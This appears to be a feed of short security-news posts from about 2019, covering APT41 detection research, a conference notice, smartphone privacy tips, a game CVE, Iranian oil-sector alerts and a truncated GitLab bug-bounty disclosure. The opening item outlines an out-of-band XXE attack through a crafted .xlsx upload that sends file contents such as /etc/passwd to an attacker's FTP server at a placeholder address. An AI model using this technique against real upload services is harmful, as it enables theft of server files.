Exfiltration through FTP using OOB XXE
Upload accepts .xlsx files --> Unzip sample .xlsx file --> add payload in workbook.xml/[Content_Types].xml after the xml declaration --> DTD file sends data via ftp://remote-ip/%data --> run ftp server using xxe-ftp-server.rb --> /etc/passwd
Via: https://twitter.com/_ayoubfathi_/status/1164536885244583941
GAME OVER: Detecting and Stopping an APT41 Operation
https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html
Forwarded from P0SCon
Abstracts are received. After evaluating the abstracts and arranging travel and resistance, the details of speakers will be announced.
P0SCon2019
📆 12 Oct 2019
Register for P0SCon2019:
🇮🇷 ::Iranian Citizens::
https://evnd.co/w3uRC
🇺🇳::Non-Iranian Citizens::
Contact: p0scon@uut.ac.ir
http://poscon.ir
@P0SCon
What happens if we use our brain's 100% capacity
https://twitter.com/cyanpiny/status/1175030939891712000
How Edward Snowden Would Use A Smartphone
- Graphene OS
- all traffic through TOR
- use ad-blocker and password manager
- use Signal or Wire
- ...
https://www.eva.nmccann.net/blog/snowden-smartphone
Counter-Strike Global Offensive CVE-2019-15943
https://blog.firosolutions.com/exploits/counter-strike-go/
Iran's Oil Sector on 'Full Alert' Against Attacks
Iran's oil minister on Sunday ordered his country's energy sector to be on high alert to the threat of "physical and cyber" attacks.
Bijan Namdar Zanganeh said "it is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats," in a statement published on the oil ministry's Shana website.
https://www.securityweek.com/irans-oil-sector-full-alert-against-attacks
Forwarded from Bug Bounty (Amir kiani)
GitLab disclosed on HackerOne: Clientside resource Exhausting by...
### Summary
Based on the documentation, GitLab markdown supports math expression rendering using `KaTex` and is able to run a subset of `LaTex` syntax; this can be achieved in 2 ways in the...